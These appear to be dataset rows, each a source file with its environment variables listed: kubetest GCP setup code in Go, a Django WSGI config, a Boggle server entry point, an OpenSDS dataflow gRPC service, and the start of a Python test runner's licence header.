if err != nil {
return err
}
defer f.Close()
e := json.NewEncoder(f)
return e.Encode(m)
}
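// Illustrative effect of the BUILD_METADATA_ scan above (a sketch; the
// variable and value are hypothetical): with BUILD_METADATA_BAZEL_VERSION=0.23
// in the environment, metadata.json gains the entry "bazel_version": "0.23"
// alongside "job-version" and "revision".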
// Install cloudsdk tarball to location, updating PATH
func installGcloud(tarball string, location string) error {
if err := os.MkdirAll(location, 0775); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("tar", "xzf", tarball, "-C", location)); err != nil {
return err
}
if err := control.FinishRunning(exec.Command(filepath.Join(location, "google-cloud-sdk", "install.sh"), "--disable-installation-options", "--bash-completion=false", "--path-update=false", "--usage-reporting=false")); err != nil {
return err
}
if err := util.InsertPath(filepath.Join(location, "google-cloud-sdk", "bin")); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("gcloud", "components", "install", "alpha")); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("gcloud", "components", "install", "beta")); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("gcloud", "info")); err != nil {
return err
}
return nil
}
func migrateGcpEnvAndOptions(o *options) error {
var network string
var zone string
switch o.provider {
case "gke":
network = "KUBE_GKE_NETWORK"
zone = "ZONE"
default:
network = "KUBE_GCE_NETWORK"
zone = "KUBE_GCE_ZONE"
}
return util.MigrateOptions([]util.MigratedOption{
{
Env: "PROJECT",
Option: &o.gcpProject,
Name: "--gcp-project",
},
{
Env: zone,
Option: &o.gcpZone,
Name: "--gcp-zone",
},
{
Env: "REGION",
Option: &o.gcpRegion,
Name: "--gcp-region",
},
{
Env: "GOOGLE_APPLICATION_CREDENTIALS",
Option: &o.gcpServiceAccount,
Name: "--gcp-service-account",
},
{
Env: network,
Option: &o.gcpNetwork,
Name: "--gcp-network",
},
{
Env: "KUBE_NODE_OS_DISTRIBUTION",
Option: &o.gcpNodeImage,
Name: "--gcp-node-image",
},
{
Env: "KUBE_MASTER_OS_DISTRIBUTION",
Option: &o.gcpMasterImage,
Name: "--gcp-master-image",
},
{
Env: "NUM_NODES",
Option: &o.gcpNodes,
Name: "--gcp-nodes",
},
{
Env: "NODE_SIZE",
Option: &o.gcpNodeSize,
Name: "--gcp-node-size",
},
{
Env: "MASTER_SIZE",
Option: &o.gcpMasterSize,
Name: "--gcp-master-size",
},
{
Env: "CLOUDSDK_BUCKET",
Option: &o.gcpCloudSdk,
Name: "--gcp-cloud-sdk",
SkipPush: true,
},
})
}
func prepareGcp(o *options) error {
if err := migrateGcpEnvAndOptions(o); err != nil {
return err
}
// Must happen before any gcloud commands
if err := activateServiceAccount(o.gcpServiceAccount); err != nil {
return err
}
if o.provider == "gce" {
if distro := os.Getenv("KUBE_OS_DISTRIBUTION"); distro != "" {
log.Printf("Please use --gcp-master-image=%s --gcp-node-image=%s (instead of deprecated KUBE_OS_DISTRIBUTION)",
distro, distro)
// Note: KUBE_OS_DISTRIBUTION takes precedence over
// KUBE_{MASTER,NODE}_OS_DISTRIBUTION, so override here
// after the migration above.
o.gcpNodeImage = distro
o.gcpMasterImage = distro
if err := os.Setenv("KUBE_NODE_OS_DISTRIBUTION", distro); err != nil {
return fmt.Errorf("could not set KUBE_NODE_OS_DISTRIBUTION=%s: %v", distro, err)
}
if err := os.Setenv("KUBE_MASTER_OS_DISTRIBUTION", distro); err != nil {
return fmt.Errorf("could not set KUBE_MASTER_OS_DISTRIBUTION=%s: %v", distro, err)
}
}
hasGCPImageFamily, hasGCPImageProject := len(o.gcpImageFamily) != 0, len(o.gcpImageProject) != 0
if hasGCPImageFamily != hasGCPImageProject {
return fmt.Errorf("--image-family and --image-project must be both set or unset")
}
if hasGCPImageFamily && hasGCPImageProject {
out, err := control.Output(exec.Command("gcloud", "compute", "images", "describe-from-family", o.gcpImageFamily, "--project", o.gcpImageProject))
if err != nil {
return fmt.Errorf("failed to get latest image from family %q in project %q: %s", o.gcpImageFamily, o.gcpImageProject, err)
}
latestImage := ""
			latestImageRegexp := regexp.MustCompile(`^name: *(\S+)`)
for _, line := range strings.Split(string(out), "\n") {
matches := latestImageRegexp.FindStringSubmatch(line)
if len(matches) == 2 {
latestImage = matches[1]
break
}
}
if len(latestImage) == 0 {
return fmt.Errorf("failed to get latest image from family %q in project %q", o.gcpImageFamily, o.gcpImageProject)
}
if o.deployment == "node" {
o.nodeArgs += fmt.Sprintf(" --images=%s --image-project=%s", latestImage, o.gcpImageProject)
} else {
os.Setenv("KUBE_GCE_NODE_IMAGE", latestImage)
os.Setenv("KUBE_GCE_NODE_PROJECT", o.gcpImageProject)
}
}
} else if o.provider == "gke" {
if o.deployment == "" {
o.deployment = "gke"
}
if o.deployment != "gke" {
return fmt.Errorf("expected --deployment=gke for --provider=gke, found --deployment=%s", o.deployment)
}
if o.gcpMasterImage != "" {
return fmt.Errorf("expected --gcp-master-image to be empty for --provider=gke, found --gcp-master-image=%s", o.gcpMasterImage)
}
if o.gcpNodes != "" {
return fmt.Errorf("--gcp-nodes cannot be set on GKE, use --gke-shape instead")
}
if o.gcpNodeSize != "" {
return fmt.Errorf("--gcp-node-size cannot be set on GKE, use --gke-shape instead")
}
if o.gcpMasterSize != "" {
return fmt.Errorf("--gcp-master-size cannot be set on GKE, where it's auto-computed")
}
// TODO(kubernetes/test-infra#3536): This is used by the
// ginkgo-e2e.sh wrapper.
nod := o.gcpNodeImage
if nod == "container_vm" {
// gcloud container clusters create understands
// "container_vm", e2es understand "debian".
nod = "debian"
}
if nod == "cos_containerd" {
// gcloud container clusters create understands
// "cos_containerd", e2es only understand
// "gci"/"cos",
nod = "gci"
}
os.Setenv("NODE_OS_DISTRIBUTION", nod)
}
if o.gcpProject == "" {
log.Print("--gcp-project is missing, trying to fetch a project from boskos.\n" +
"(for local runs please set --gcp-project to your dev project)")
var resType string
if o.gcpProjectType != "" {
resType = o.gcpProjectType
} else if o.provider == "gke" {
resType = "gke-project"
} else {
resType = "gce-project"
}
log.Printf("provider %v, will acquire project type %v from boskos", o.provider, resType)
// let's retry 5min to get next available resource
ctx, cancel := context.WithTimeout(context.Background(), o.boskosWaitDuration)
defer cancel()
p, err := boskos.AcquireWait(ctx, resType, "free", "busy")
if err != nil {
return fmt.Errorf("--provider=%s boskos failed to acquire project: %v", o.provider, err)
}
if p == nil {
return fmt.Errorf("boskos does not have a free %s at the moment", resType)
}
go func(c *client.Client, proj string) {
for range time.Tick(time.Minute * 5) {
if err := c.UpdateOne(p.Name, "busy", nil); err != nil {
log.Printf("[Boskos] Update of %s failed with %v", p.Name, err)
}
}
}(boskos, p.Name)
o.gcpProject = p.Name
}
if err := os.Setenv("CLOUDSDK_CORE_PRINT_UNHANDLED_TRACEBACKS", "1"); err != nil {
return fmt.Errorf("could not set CLOUDSDK_CORE_PRINT_UNHANDLED_TRACEBACKS=1: %v", err)
}
if err := control.FinishRunning(exec.Command("gcloud", "config", "set", "project", o.gcpProject)); err != nil {
return fmt.Errorf("fail to set project %s : err %v", o.gcpProject, err)
}
// TODO(krzyzacy):Remove this when we retire migrateGcpEnvAndOptions
	// Note that a lot of scripts in the k/k repo still depend on this env.
if err := os.Setenv("PROJECT", o.gcpProject); err != nil {
return fmt.Errorf("fail to set env var PROJECT %s : err %v", o.gcpProject, err)
}
// Ensure ssh keys exist
log.Print("Checking existing of GCP ssh keys...")
k := filepath.Join(util.Home(".ssh"), "google_compute_engine")
if _, err := os.Stat(k); err != nil {
return err
}
pk := k + ".pub"
if _, err := os.Stat(pk); err != nil {
return err
}
log.Printf("Checking presence of public key in %s", o.gcpProject)
if out, err := control.Output(exec.Command("gcloud", "compute", "--project="+o.gcpProject, "project-info", "describe")); err != nil {
return err
} else if b, err := ioutil.ReadFile(pk); err != nil {
return err
} else if !strings.Contains(string(out), string(b)) {
log.Print("Uploading public ssh key to project metadata...")
if err = control.FinishRunning(exec.Command("gcloud", "compute", "--project="+o.gcpProject, "config-ssh")); err != nil {
return err
}
}
// Install custom gcloud version if necessary
if o.gcpCloudSdk != "" {
for i := 0; i < 3; i++ {
if err := control.FinishRunning(exec.Command("gsutil", "-mq", "cp", "-r", o.gcpCloudSdk, util.Home())); err == nil {
break // Success!
}
time.Sleep(1 << uint(i) * time.Second)
}
for _, f := range []string{util.Home(".gsutil"), util.Home("repo"), util.Home("cloudsdk")} {
if _, err := os.Stat(f); err == nil || !os.IsNotExist(err) {
if err = os.RemoveAll(f); err != nil {
return err
}
}
}
install := util.Home("repo", "google-cloud-sdk.tar.gz")
if strings.HasSuffix(o.gcpCloudSdk, ".tar.gz") {
install = util.Home(filepath.Base(o.gcpCloudSdk))
} else {
if err := os.Rename(util.Home(filepath.Base(o.gcpCloudSdk)), util.Home("repo")); err != nil {
return err
}
// Controls which gcloud components to install.
pop, err := util.PushEnv("CLOUDSDK_COMPONENT_MANAGER_SNAPSHOT_URL", "file://"+util.Home("repo", "components-2.json"))
if err != nil {
return err
}
defer pop()
}
if err := installGcloud(install, util.Home("cloudsdk")); err != nil {
return err
}
// gcloud creds may have changed
if err := activateServiceAccount(o.gcpServiceAccount); err != nil {
return err
}
}
if o.kubemark {
if p := os.Getenv("KUBEMARK_BAZEL_BUILD"); strings.ToLower(p) == "y" {
// we need docker-credential-gcr to get authed properly
// https://github.com/bazelbuild/rules_docker#authorization
if err := control.FinishRunning(exec.Command("gcloud", "components", "install", "docker-credential-gcr")); err != nil {
return err
}
if err := control.FinishRunning(exec.Command("docker-credential-gcr", "configure-docker")); err != nil {
return err
}
}
}
return nil
}
func prepareAws(o *options) error {
// gcloud creds may have changed
if err := activateServiceAccount(o.gcpServiceAccount); err != nil {
return err
}
return control.FinishRunning(exec.Command("pip", "install", "awscli"))
}
// Activate GOOGLE_APPLICATION_CREDENTIALS if set or do nothing.
func activateServiceAccount(path string) error {
if path == "" {
return nil
}
return control.FinishRunning(exec.Command("gcloud", "auth", "activate-service-account", "--key-file="+path))
}
// Make all artifacts world readable.
// The root user winds up owning the files when the container exits.
// Ensure that other users can read these files at that time.
func chmodArtifacts() error {
return control.FinishRunning(exec.Command("chmod", "-R", "o+r", artifacts))
}
func prepare(o *options) error {
if err := util.MigrateOptions([]util.MigratedOption{
{
Env: "KUBERNETES_PROVIDER",
Option: &o.provider,
Name: "--provider",
},
{
Env: "CLUSTER_NAME",
Option: &o.cluster,
Name: "--cluster",
},
}); err != nil {
return err
}
if err := prepareGinkgoParallel(&o.ginkgoParallel); err != nil {
return err
}
switch o.provider {
case "gce", "gke", "node":
if err := prepareGcp(o); err != nil {
return err
}
case "aws":
if err := prepareAws(o); err != nil {
return err
}
}
if o.kubemark {
if err := util.MigrateOptions([]util.MigratedOption{
{
Env: "KUBEMARK_NUM_NODES",
Option: &o.kubemarkNodes,
Name: "--kubemark-nodes",
},
{
Env: "KUBEMARK_MASTER_SIZE",
Option: &o.kubemarkMasterSize,
Name: "--kubemark-master-size",
},
}); err != nil {
return err
}
}
if err := os.MkdirAll(artifacts, 0777); err != nil { // Create artifacts
return err
}
return nil
}
type ginkgoParallelValue struct {
v int // 0 == not set (defaults to 1)
}
func (v *ginkgoParallelValue) IsBoolFlag() bool {
return true
}
func (v *ginkgoParallelValue) String() string {
if v.v == 0 {
return "1"
}
return strconv.Itoa(v.v)
}
func (v *ginkgoParallelValue) Set(s string) error {
if s == "" {
v.v = 0
return nil
}
if s == "true" {
v.v = defaultGinkgoParallel
return nil
}
p, err := strconv.Atoi(s)
if err != nil {
return fmt.Errorf("--ginkgo-parallel must be an integer, found %q", s)
}
if p < 1 {
return fmt.Errorf("--ginkgo-parallel must be >= 1, found %d", p)
}
v.v = p
return nil
}
func (v *ginkgoParallelValue) Type() string {
return "ginkgoParallelValue"
}
func (v *ginkgoParallelValue) Get() int {
if v.v == 0 {
return 1
}
return v.v
}
var _ flag.Value = &ginkgoParallelValue{}
// Hand migrate this option. GINKGO_PARALLEL => GINKGO_PARALLEL_NODES=25
func prepareGinkgoParallel(v *ginkgoParallelValue) error {
if p := os.Getenv("GINKGO_PARALLEL"); strings.ToLower(p) == "y" {
log.Printf("Please use kubetest --ginkgo-parallel (instead of deprecated GINKGO_PARALLEL=y)")
if err := v.Set("true"); err != nil {
return err
}
os.Unsetenv("GINKGO_PARALLEL")
}
if p := os.Getenv("GINKGO_PARALLEL_NODES"); p != "" {
log.Printf("Please use kubetest --ginkgo-parallel=%s (instead of deprecated GINKGO_PARALLEL_NODES=%s)", p, p)
if err := v.Set(p); err != nil {
return err
}
}
os.Setenv("GINKGO_PARALLEL_NODES", v.String())
return nil
}
func publish(pub string) error {
v, err := ioutil.ReadFile("version")
if err != nil {
return err
}
log.Printf("Set %s version to %s", pub, string(v))
return gcsWrite(pub, v)
}
| [
"\"WORKSPACE\"",
"\"JOB_NAME\"",
"\"KUBETEST_IN_DOCKER\"",
"\"ARTIFACTS\"",
"\"KUBE_OS_DISTRIBUTION\"",
"\"KUBEMARK_BAZEL_BUILD\"",
"\"GINKGO_PARALLEL\"",
"\"GINKGO_PARALLEL_NODES\""
] | [] | [
"KUBEMARK_BAZEL_BUILD",
"ARTIFACTS",
"JOB_NAME",
"KUBETEST_IN_DOCKER",
"GINKGO_PARALLEL",
"GINKGO_PARALLEL_NODES",
"WORKSPACE",
"KUBE_OS_DISTRIBUTION"
] | [] | ["KUBEMARK_BAZEL_BUILD", "ARTIFACTS", "JOB_NAME", "KUBETEST_IN_DOCKER", "GINKGO_PARALLEL", "GINKGO_PARALLEL_NODES", "WORKSPACE", "KUBE_OS_DISTRIBUTION"] | go | 8 | 0 | |
rc_server/wsgi.py | """
WSGI config for rc_server project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "rc_server.settings")
application = get_wsgi_application()
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if path not in sys.path:
sys.path.append(path)
'''
https://stackoverflow.com/questions/36210686/importerror-no-module-named-mysite-settings-django/36211423
Daphne gets error: ImportError: No module named 'rc_car.settings'
'''
| [] | [] | [] | [] | [] | python | 0 | 0 | |
cmd/bogglehttpd/bogglehttpd.go | package main
import (
"log"
"os"
"github.com/DavidNix/boggle/server"
)
func main() {
port := os.Getenv("PORT")
log.Println("starting server on port", port, "...")
err := server.ListenAndServe(port)
if err != nil {
log.Fatalln("server failed", err)
}
}
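// Illustrative invocation (a sketch; the port value is arbitrary):
//
//	PORT=8080 ./bogglehttpd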
| [
"\"PORT\""
] | [] | [
"PORT"
] | [] | ["PORT"] | go | 1 | 0 | |
dataflow/pkg/service.go | // Copyright 2019 The OpenSDS Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package pkg
import (
"context"
"encoding/json"
"errors"
"fmt"
"os"
"strings"
"github.com/opensds/multi-cloud/dataflow/pkg/db"
"github.com/opensds/multi-cloud/dataflow/pkg/job"
"github.com/opensds/multi-cloud/dataflow/pkg/kafka"
"github.com/opensds/multi-cloud/dataflow/pkg/model"
"github.com/opensds/multi-cloud/dataflow/pkg/plan"
"github.com/opensds/multi-cloud/dataflow/pkg/policy"
"github.com/opensds/multi-cloud/dataflow/pkg/utils"
. "github.com/opensds/multi-cloud/dataflow/pkg/utils"
pb "github.com/opensds/multi-cloud/dataflow/proto"
log "github.com/sirupsen/logrus"
)
type dataflowService struct{}
func NewDataFlowService() pb.DataFlowHandler {
host := os.Getenv("DB_HOST")
dbstor := Database{Credential: "unkonwn", Driver: "mongodb", Endpoint: host}
db.Init(&dbstor)
addrs := []string{}
config := strings.Split(os.Getenv("KAFKA_ADVERTISED_LISTENERS"), ";")
for i := 0; i < len(config); i++ {
addr := strings.Split(config[i], "//")
if len(addr) != 2 {
log.Info("Invalid addr:", config[i])
} else {
addrs = append(addrs, addr[1])
}
}
kafka.Init(addrs)
return &dataflowService{}
}
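// Illustrative environment for NewDataFlowService (a sketch; the host names
// are hypothetical):
//
//	DB_HOST=datastore:27017
//	KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://kafka1:9092;PLAINTEXT://kafka2:9092
//
// The parsing loop above keeps only the host:port part ("kafka1:9092") of
// each listener entry.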
func policyModel2Resp(policy *model.Policy) *pb.Policy {
return &pb.Policy{
Id: policy.Id.Hex(),
Name: policy.Name,
Description: policy.Description,
Tenant: policy.TenantId,
UserId: policy.UserId,
Schedule: &pb.Schedule{
Type: policy.Schedule.Type,
TiggerProperties: policy.Schedule.TriggerProperties,
},
}
}
func (b *dataflowService) GetPolicy(ctx context.Context, in *pb.GetPolicyRequest, out *pb.GetPolicyResponse) error {
log.Info("Get policy is called in dataflow service.")
id := in.GetId()
if id == "" {
return errors.New("No id provided.")
}
p, err := policy.Get(ctx, id)
if err != nil {
return err
}
out.Policy = policyModel2Resp(p)
//For debug -- begin
jsons1, errs1 := json.Marshal(out)
if errs1 != nil {
		log.Info(errs1.Error())
} else {
log.Infof("jsons1: %s.\n", jsons1)
}
//For debug -- end
return err
}
func (b *dataflowService) ListPolicy(ctx context.Context, in *pb.ListPolicyRequest, out *pb.ListPolicyResponse) error {
log.Info("List policy is called in dataflow service.")
pols, err := policy.List(ctx)
if err != nil {
log.Infof("List policy err:%s.", err)
return nil
}
for _, p := range pols {
out.Policies = append(out.Policies, policyModel2Resp(&p))
}
//For debug -- begin
jsons1, errs1 := json.Marshal(out)
if errs1 != nil {
		log.Info(errs1.Error())
} else {
log.Infof("jsons1: %s.\n", jsons1)
}
//For debug -- end
return err
}
func (b *dataflowService) CreatePolicy(ctx context.Context, in *pb.CreatePolicyRequest,
out *pb.CreatePolicyResponse) error {
log.Info("Create policy is called in dataflow service.")
pol := model.Policy{}
pol.Name = in.Policy.GetName()
pol.Description = in.Policy.GetDescription()
if in.Policy.GetSchedule() != nil {
pol.Schedule.Type = in.Policy.Schedule.Type
pol.Schedule.TriggerProperties = in.Policy.Schedule.TiggerProperties
} else {
out.Err = "get schedule failed"
return errors.New("get schedule failed")
}
if pol.Name == "" {
out.Err = "no name provided."
return errors.New("et schedule failed")
}
pol.TenantId = in.Policy.TenantId
pol.UserId = in.Policy.UserId
log.Infof("dataflowservice CreatePolicy:%+v\n", pol)
p, err := policy.Create(ctx, &pol)
if err != nil {
log.Infof("create policy err:%s.", out.Err)
return nil
}
out.Policy = policyModel2Resp(p)
return nil
}
func (b *dataflowService) DeletePolicy(ctx context.Context, in *pb.DeletePolicyRequest, out *pb.DeletePolicyResponse) error {
log.Info("Delete policy is called in dataflow service.")
id := in.GetId()
if id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
err := policy.Delete(ctx, id)
if err == nil {
out.Err = ""
} else {
out.Err = err.Error()
}
log.Infof("Delete policy err:%s.", out.Err)
return err
}
func (b *dataflowService) UpdatePolicy(ctx context.Context, in *pb.UpdatePolicyRequest, out *pb.UpdatePolicyResponse) error {
log.Info("Update policy is called in dataflow service.")
policyId := in.GetPolicyId()
if policyId == "" {
return errors.New("no id provided.")
}
log.Infof("body:%s", in.GetBody())
updateMap := map[string]interface{}{}
if err := json.Unmarshal([]byte(in.GetBody()), &updateMap); err != nil {
return err
}
p, err := policy.Update(ctx, policyId, updateMap)
if err != nil {
log.Infof("Update policy finished, err:%s", err)
return err
}
out.Policy = policyModel2Resp(p)
return nil
}
func fillRspConnector(out *pb.Connector, in *model.Connector) {
switch in.StorType {
case model.STOR_TYPE_OPENSDS:
out.BucketName = in.BucketName
case model.STOR_TYPE_AWS_S3, model.STOR_TYPE_HW_OBS, model.STOR_TYPE_HW_FUSIONSTORAGE, model.STOR_TYPE_HW_FUSIONCLOUD,
model.STOR_TYPE_AZURE_BLOB, model.STOR_TYPE_CEPH_S3, model.STOR_TYPE_GCP_S3, model.STOR_TYPE_ALIBABA_OSS:
for i := 0; i < len(in.ConnConfig); i++ {
out.ConnConfig = append(out.ConnConfig, &pb.KV{Key: in.ConnConfig[i].Key, Value: in.ConnConfig[i].Value})
}
default:
log.Infof("Not support connector type:%v\n", in.StorType)
}
}
func planModel2Resp(plan *model.Plan) *pb.Plan {
resp := &pb.Plan{
Id: string(plan.Id.Hex()),
Name: plan.Name,
Description: plan.Description,
Type: plan.Type,
PolicyId: plan.PolicyId,
PolicyName: plan.PolicyName,
PolicyEnabled: plan.PolicyEnabled,
RemainSource: plan.RemainSource,
TenantId: plan.TenantId,
UserId: plan.UserId,
}
srcConn := pb.Connector{StorType: plan.SourceConn.StorType}
fillRspConnector(&srcConn, &plan.SourceConn)
destConn := pb.Connector{StorType: plan.DestConn.StorType}
fillRspConnector(&destConn, &plan.DestConn)
filter := pb.Filter{Prefix: plan.Filter.Prefix}
for _, t := range plan.Filter.Tag {
tag := &pb.KV{Key: t.Key, Value: t.Value}
filter.Tag = append(filter.Tag, tag)
}
resp.SourceConn = &srcConn
resp.DestConn = &destConn
resp.Filter = &filter
return resp
}
func (b *dataflowService) GetPlan(ctx context.Context, in *pb.GetPlanRequest, out *pb.GetPlanResponse) error {
log.Info("Get plan is called in dataflow service.")
id := in.GetId()
if id == "" {
errmsg := fmt.Sprint("no id specified.")
out.Err = errmsg
return errors.New(errmsg)
}
p, err := plan.Get(ctx, id)
if err != nil {
log.Infof("Get plan err:%s.", err)
return err
}
out.Plan = planModel2Resp(p)
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
		log.Info(errs.Error())
} else {
log.Infof("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
func (b *dataflowService) ListPlan(ctx context.Context, in *pb.ListPlanRequest, out *pb.ListPlanResponse) error {
log.Info("List plans is called in dataflow service.")
if in.Limit < 0 || in.Offset < 0 {
msg := fmt.Sprintf("Invalid pagination parameter, limit = %d and offset = %d.", in.Limit, in.Offset)
log.Info(msg)
return errors.New(msg)
}
plans, err := plan.List(ctx, int(in.Limit), int(in.Offset), in.Filter)
if err != nil {
log.Infof("List plans err:%s.", err)
return err
}
for _, p := range plans {
out.Plans = append(out.Plans, planModel2Resp(&p))
}
out.Next = in.Offset + int32(len(plans))
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
		log.Info(errs.Error())
} else {
log.Infof("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
func fillReqConnector(out *model.Connector, in *pb.Connector) error {
switch in.StorType {
case model.STOR_TYPE_OPENSDS:
out.BucketName = in.BucketName
return nil
case model.STOR_TYPE_AWS_S3, model.STOR_TYPE_HW_OBS, model.STOR_TYPE_HW_FUSIONSTORAGE, model.STOR_TYPE_HW_FUSIONCLOUD,
model.STOR_TYPE_AZURE_BLOB, model.STOR_TYPE_CEPH_S3, model.STOR_TYPE_GCP_S3, model.STOR_TYPE_IBM_COS, model.STOR_TYPE_ALIBABA_OSS:
for i := 0; i < len(in.ConnConfig); i++ {
out.ConnConfig = append(out.ConnConfig, model.KeyValue{Key: in.ConnConfig[i].Key, Value: in.ConnConfig[i].Value})
}
return nil
default:
log.Infof("Not support connector type:%v\n", in.StorType)
return errors.New("Invalid connector type.")
}
}
func (b *dataflowService) CreatePlan(ctx context.Context, in *pb.CreatePlanRequest, out *pb.CreatePlanResponse) error {
log.Info("Create plan is called in dataflow service.")
pl := model.Plan{}
pl.Name = in.Plan.GetName()
pl.Description = in.Plan.GetDescription()
pl.Type = in.Plan.GetType()
pl.RemainSource = in.Plan.GetRemainSource()
pl.PolicyId = in.Plan.GetPolicyId()
pl.PolicyEnabled = in.Plan.GetPolicyEnabled()
pl.UserId = in.Plan.UserId
pl.TenantId = in.Plan.TenantId
if in.Plan.GetSourceConn() != nil {
srcConn := model.Connector{StorType: in.Plan.SourceConn.StorType}
err := fillReqConnector(&srcConn, in.Plan.SourceConn)
if err == nil {
pl.SourceConn = srcConn
} else {
return err
}
} else {
out.Err = "get source connector failed"
return errors.New("invalid source connector")
}
if in.Plan.GetDestConn() != nil {
destConn := model.Connector{StorType: in.Plan.DestConn.StorType}
err := fillReqConnector(&destConn, in.Plan.DestConn)
if err == nil {
pl.DestConn = destConn
} else {
out.Err = err.Error()
return err
}
} else {
out.Err = "get destination connector failed"
return errors.New("invalid destination connector")
}
if in.Plan.GetFilter() != nil {
if in.Plan.Filter.Prefix != "" {
pl.Filter = model.Filter{Prefix: in.Plan.Filter.Prefix}
}
if len(in.Plan.Filter.Tag) > 0 {
for j := 0; j < len(in.Plan.Filter.Tag); j++ {
pl.Filter.Tag = append(pl.Filter.Tag, model.KeyValue{Key: in.Plan.Filter.Tag[j].Key, Value: in.Plan.Filter.Tag[j].Value})
}
}
}
if pl.Name == "" || pl.Type == "" {
out.Err = "Name or type is null."
return errors.New("Name or type is null.")
}
p, err := plan.Create(ctx, &pl)
if err != nil {
log.Infof("Create plan failed, err:%v", err)
return err
}
out.Plan = planModel2Resp(p)
return nil
}
func (b *dataflowService) DeletePlan(ctx context.Context, in *pb.DeletePlanRequest, out *pb.DeletePlanResponse) error {
log.Info("Delete plan is called in dataflow service.")
id := in.GetId()
if id == "" {
out.Err = "Get id failed."
return errors.New("Get id failed.")
}
err := plan.Delete(ctx, id)
if err == nil {
out.Err = ""
} else {
out.Err = err.Error()
}
log.Infof("Delete plan err:%s.", out.Err)
return err
}
func (b *dataflowService) UpdatePlan(ctx context.Context, in *pb.UpdatePlanRequest, out *pb.UpdatePlanResponse) error {
log.Info("Update plan is called in dataflow service.")
if in.GetPlanId() == "" {
return errors.New("No id provided.")
}
updateMap := map[string]interface{}{}
if err := json.Unmarshal([]byte(in.GetBody()), &updateMap); err != nil {
return err
}
p, err := plan.Update(ctx, in.GetPlanId(), updateMap)
if err != nil {
log.Infof("Update plan finished, err:%s.", err)
return err
}
out.Plan = planModel2Resp(p)
return nil
}
func (b *dataflowService) RunPlan(ctx context.Context, in *pb.RunPlanRequest, out *pb.RunPlanResponse) error {
log.Info("Run plan is called in dataflow service.")
tenantId, err := utils.GetTenantId(ctx)
if err != nil {
log.Errorf("run plan failed, err=%v\n", err)
return err
}
userId, err := utils.GetUserId(ctx)
if err != nil {
log.Errorf("run plan failed, err=%v\n", err)
return err
}
jid, err := plan.Run(in.Id, tenantId, userId)
if err == nil {
out.JobId = string(jid.Hex())
out.Err = ""
} else {
out.JobId = ""
out.Err = err.Error()
log.Infof("Run plan err:%s.", out.Err)
}
return err
}
func (b *dataflowService) GetJob(ctx context.Context, in *pb.GetJobRequest, out *pb.GetJobResponse) error {
log.Info("Get job is called in dataflow service.")
if in.Id == "" {
errmsg := fmt.Sprint("No id specified.")
out.Err = errmsg
return errors.New(errmsg)
}
jb, err := job.Get(ctx, in.Id)
if err != nil {
log.Infof("Get job err:%d.", err)
out.Err = err.Error()
return err
} else {
out.Job = &pb.Job{Id: string(jb.Id.Hex()), Type: jb.Type, PlanName: jb.PlanName, PlanId: jb.PlanId,
Description: "for test", SourceLocation: jb.SourceLocation, DestLocation: jb.DestLocation,
CreateTime: jb.CreateTime.Unix(), EndTime: jb.EndTime.Unix(), Status: jb.Status, TotalCapacity: jb.TotalCapacity,
PassedCapacity: jb.PassedCapacity, TotalCount: jb.TotalCount, PassedCount: jb.PassedCount, Progress: jb.Progress}
}
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
		log.Info(errs.Error())
} else {
log.Infof("jsons1: %s.\n", jsons)
}
//For debug -- end
return err
}
func (b *dataflowService) ListJob(ctx context.Context, in *pb.ListJobRequest, out *pb.ListJobResponse) error {
log.Info("List job is called in dataflow service.")
if in.Limit < 0 || in.Offset < 0 {
msg := fmt.Sprintf("invalid pagination parameter, limit = %d and offset = %d.", in.Limit, in.Offset)
log.Info(msg)
return errors.New(msg)
}
jobs, err := job.List(ctx, int(in.Limit), int(in.Offset), in.Filter)
if err != nil {
log.Infof("Get job err:%d.", err)
return err
}
if err == nil {
//for i := 0; i < len(jobs); i++ {
for _, job := range jobs {
//TODO: need change according to real scenario
j := pb.Job{Id: string(job.Id.Hex()), Type: job.Type, PlanName: job.PlanName, PlanId: job.PlanId,
SourceLocation: job.SourceLocation, DestLocation: job.DestLocation, StartTime: job.StartTime.Unix(),
CreateTime: job.CreateTime.Unix(), EndTime: job.EndTime.Unix(), Status: job.Status,
TotalCapacity: job.TotalCapacity, PassedCapacity: job.PassedCapacity, TotalCount: int64(job.TotalCount),
PassedCount: (int64(job.PassedCount)), Progress: int64(job.Progress)}
out.Jobs = append(out.Jobs, &j)
}
}
out.Next = in.Offset + int32(len(jobs))
//For debug -- begin
jsons, errs := json.Marshal(out)
if errs != nil {
		log.Info(errs.Error())
} else {
log.Infof("Got jobs: %s.\n", jsons)
}
//For debug -- end
return err
}
| [
"\"DB_HOST\"",
"\"KAFKA_ADVERTISED_LISTENERS\""
] | [] | [
"KAFKA_ADVERTISED_LISTENERS",
"DB_HOST"
] | [] | ["KAFKA_ADVERTISED_LISTENERS", "DB_HOST"] | go | 2 | 0 | |
tests/test-runners/run_all.py | #!/usr/bin/env python
# Copyright 2020, Kay Hayen, mailto:[email protected]
#
# Python test originally created or extracted from other peoples work. The
# parts from me are licensed as below. It is at least Free Software where
# it's copied from other people. In these cases, that will normally be
# indicated.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
